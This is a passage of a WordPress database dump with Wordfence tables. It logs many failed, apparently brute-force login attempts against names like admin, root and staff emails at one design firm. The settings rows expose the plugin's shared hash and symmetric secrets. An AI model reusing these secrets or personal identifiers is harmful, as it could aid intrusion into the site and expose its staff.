Firefox/87.0'),(6119,10652,1630945834.711244,1,'loginFailInvalidUsername','katy',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6120,10652,1630945834.838471,1,'loginFailInvalidUsername','katy',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6121,10653,1630945835.775045,1,'loginFailInvalidUsername','katy@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6122,10653,1630945835.834976,1,'loginFailInvalidUsername','katy@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6123,10654,1630945836.685681,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6124,10654,1630945836.756353,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6125,10655,1630945837.604744,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6126,10655,1630945837.638222,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6127,10656,1630945838.520829,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6128,10656,1630945838.571324,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6129,10657,1630945839.388639,1,'loginFailInvalidUsername','223801721',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6130,10657,1630945839.413440,1,'loginFailInvalidUsername','223801721',0,'\0\0\0\0\0\0\0\0\0\0��.\'6�','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(6131,10658,1630946839.338352,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\r�c�','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6132,10659,1630989022.665737,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6133,10660,1630989032.151563,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6134,10661,1630989041.416141,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6135,10662,1630989056.097803,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6136,10663,1630989062.887596,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6137,10664,1630989071.849747,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6138,10665,1630989082.448076,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��gx�_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6139,10666,1630994446.161230,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6140,10666,1630994447.950891,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6141,10667,1630994452.503747,1,'loginFailInvalidUsername','katy',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6142,10667,1630994452.976342,1,'loginFailInvalidUsername','katy',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6143,10668,1630994457.657177,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6144,10668,1630994459.640201,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6145,10669,1630994474.293859,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6146,10669,1630994475.385027,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6147,10670,1630994479.466926,1,'loginFailInvalidUsername','katy@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6148,10670,1630994480.020988,1,'loginFailInvalidUsername','katy@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6149,10671,1630994483.669804,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6150,10671,1630994484.214454,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6151,10672,1630994488.293652,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6152,10672,1630994488.808265,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���xk','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6153,10678,1630998688.485602,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[K ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6154,10690,1631004487.679527,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[i�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6155,10703,1631012238.774127,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��;=�1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6156,10704,1631012247.198440,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6157,10705,1631012255.109733,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6158,10706,1631012262.910198,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6159,10707,1631012272.342771,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6160,10708,1631012285.089070,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6161,10709,1631012290.400101,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��=U*3','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6162,10897,1631078384.693417,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����9','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6163,10899,1631078854.510438,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"DaF','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6164,10900,1631078855.966804,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6165,10910,1631081200.004235,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Vh\'�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6166,10970,1631253318.564575,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6167,10971,1631253322.939354,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6168,10972,1631253328.667904,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6169,10973,1631253332.224601,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6170,10974,1631253336.513948,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6171,10975,1631253341.532249,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6172,10976,1631253344.450298,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��1��o','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6173,10977,1631255927.904848,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��h�N�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(6174,10999,1631301474.282871,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6175,11000,1631301479.027961,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6176,11001,1631301485.550150,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6177,11002,1631301491.956895,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6178,11003,1631301499.335839,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6179,11004,1631301506.508331,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6180,11005,1631301513.383281,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��ړ��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6181,11039,1631321889.909265,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6182,11060,1631336469.966807,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��>��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6183,11065,1631338589.075013,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0��h�K!','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)'),(6184,11104,1631361057.152297,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6185,11105,1631361070.229124,1,'loginFailInvalidUsername','simon.davies',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6186,11106,1631361083.920755,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6187,11107,1631361093.990780,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6188,11108,1631361105.254677,1,'loginFailInvalidUsername','simon.davies@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6189,11109,1631361115.314390,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6190,11110,1631361125.880004,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��I[� ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6191,11111,1631361473.316723,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��sU','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6192,11183,1631416826.697703,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��u�7�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6193,11184,1631416831.134865,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6194,11185,1631416837.934064,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6195,11186,1631416841.749743,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6196,11187,1631416845.635690,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6197,11188,1631416853.321926,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6198,11189,1631416857.866834,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6199,11190,1631416863.435908,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��ڛ�@','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6200,11206,1631420464.384091,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6201,11293,1631444450.108623,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6202,11314,1631451699.767774,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6203,11358,1631487912.196526,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"�1�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(6204,11413,1631570179.236088,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N�(R','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(6205,11415,1631572718.998336,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6206,11416,1631572732.851515,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0����G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6207,11417,1631572742.077437,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0����G','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6208,11418,1631572757.984296,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��� �','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6209,11419,1631572777.034664,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��q�tS','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6210,11420,1631572786.210965,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��q�tS','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6211,11421,1631572795.992518,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0���z��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6212,11423,1631577655.829885,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6213,11424,1631577657.780664,1,'loginFailInvalidUsername','marc',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6214,11425,1631577659.610053,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6215,11426,1631577661.700546,1,'loginFailInvalidUsername','root',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6216,11427,1631577663.353561,1,'loginFailInvalidUsername','marc@dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6217,11428,1631577665.168015,1,'loginFailInvalidUsername','dogstardesign.co.uk',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6218,11429,1631577667.447149,1,'loginFailInvalidUsername','administrator',0,'\0\0\0\0\0\0\0\0\0\0��I�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(6219,11443,1631612419.712033,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����E.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0');
/*!40000 ALTER TABLE `wp_wflogins` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_2fa_secrets`
--
DROP TABLE IF EXISTS `wp_wfls_2fa_secrets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_2fa_secrets` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL,
`secret` tinyblob NOT NULL,
`recovery` blob NOT NULL,
`ctime` int(10) unsigned NOT NULL,
`vtime` int(10) unsigned NOT NULL,
`mode` enum('authenticator') NOT NULL DEFAULT 'authenticator',
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_2fa_secrets`
--
LOCK TABLES `wp_wfls_2fa_secrets` WRITE;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfls_2fa_secrets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfls_settings`
--
DROP TABLE IF EXISTS `wp_wfls_settings`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfls_settings` (
`name` varchar(191) NOT NULL DEFAULT '',
`value` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfls_settings`
--
LOCK TABLES `wp_wfls_settings` WRITE;
/*!40000 ALTER TABLE `wp_wfls_settings` DISABLE KEYS */;
INSERT INTO `wp_wfls_settings` VALUES ('allow-xml-rpc','1','yes'),('captcha-stats','{\"counts\":[0,0,0,0,0,0,0,0,0,0,0],\"avg\":0}','yes'),('delete-deactivation','','yes'),('enable-auth-captcha','','yes'),('global-notices','[]','yes'),('ip-source','','yes'),('ip-trusted-proxies','','yes'),('last-secret-refresh','1624357908','yes'),('ntp-offset','0.20627093315125','yes'),('recaptcha-threshold','0.5','yes'),('remember-device','','yes'),('remember-device-duration','2592000','yes'),('require-2fa-grace-period-enabled','','yes'),('require-2fa.administrator','','yes'),('shared-hash-secret','81d659005b5a106d1491846694638dfb1ee33b4ec39074ada1b0bc6c3712a82e','yes'),('shared-symmetric-secret','5b4a939af40ee60f40f7a6d06d9fe6c7380a5f12026d7f8c3435706cd5de3f65','yes'),('use-ntp','','yes'),('whitelisted','','yes'),('xmlrpc-enabled','1','yes');
/*!40000 ALTER TABLE `wp_wfls_settings` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfnotifications`
--
DROP TABLE IF EXISTS `wp_wfnotifications`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfnotifications` (
`id` varchar(32) NOT NULL DEFAULT '',
